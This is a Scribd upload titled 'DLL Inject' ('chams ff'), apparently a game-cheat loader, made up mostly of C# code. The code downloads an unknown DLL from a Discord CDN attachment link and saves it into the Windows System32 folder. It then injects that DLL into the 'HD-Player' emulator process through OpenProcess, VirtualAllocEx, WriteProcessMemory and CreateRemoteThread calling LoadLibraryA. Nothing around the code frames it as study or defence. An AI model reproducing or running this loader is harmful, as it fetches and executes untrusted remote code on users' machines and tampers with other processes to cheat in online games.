Scribd
Upload
6 views

DLL Inject

chams ff

Uploaded by

bosstergame23
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
6 views

DLL Inject

chams ff

Uploaded by

bosstergame23
Copyright
© © All Rights Reserved
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

[DllImport("kernel32.

dll")]
public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle,
int dwProcessId);
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError
= true)]
static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress,
uint dwSize, uint flAllocationType, uint flProtect);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress,
byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
[DllImport("kernel32.dll")]
static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr
lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter,
uint dwCreationFlags, IntPtr lpThreadId);
const int PROCESS_CREATE_THREAD = 0x0002;
const int PROCESS_QUERY_INFORMATION = 0x0400;
const int PROCESS_VM_OPERATION = 0x0008;
const int PROCESS_VM_WRITE = 0x0020;
const int PROCESS_VM_READ = 0x0010;
const uint MEM_COMMIT = 0x00001000;
const uint MEM_RESERVE = 0x00002000;
const uint PAGE_READWRITE = 4;
private void guna2Button2_Click(object sender, EventArgs e)
{
string fileName = "C:\\Windows\\System32\\ZeroxVip.dll";
ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
string adress =
"https://cdn.discordapp.com/attachments/1236909298626596884/1237303641812107264/
ZeroxVip.dll?
ex=6650e910&is=664f9790&hm=76acc9321ffe36a180a8816dc05254eed815c6a28ea0df59995403be
f0a80365&";
bool flag = File.Exists(fileName);
if (flag)
{
File.Delete(fileName);
}
this.webclient.DownloadFile(adress, fileName);
Process targetProcess = Process.GetProcessesByName("HD-Player")[0];
IntPtr procHandle = OpenProcess(PROCESS_CREATE_THREAD |
PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE |
PROCESS_VM_READ, false, targetProcess.Id);
IntPtr loadLibraryAddr = GetProcAddress(GetModuleHandle("kernel32.dll"),
"LoadLibraryA");
string dllName = "ZeroxVip.dll";
IntPtr allocMemAddress = VirtualAllocEx(procHandle, IntPtr.Zero, (uint)
((dllName.Length + 1) * Marshal.SizeOf(typeof(char))), MEM_COMMIT | MEM_RESERVE,
PAGE_READWRITE);
UIntPtr bytesWritten;
WriteProcessMemory(procHandle, allocMemAddress,
Encoding.Default.GetBytes(dllName), (uint)((dllName.Length + 1) *
Marshal.SizeOf(typeof(char))), out bytesWritten);
CreateRemoteThread(procHandle, IntPtr.Zero, 0, loadLibraryAddr,
allocMemAddress, 0, IntPtr.Zero);
}
private WebClient webclient = new WebClient();
@here

You might also like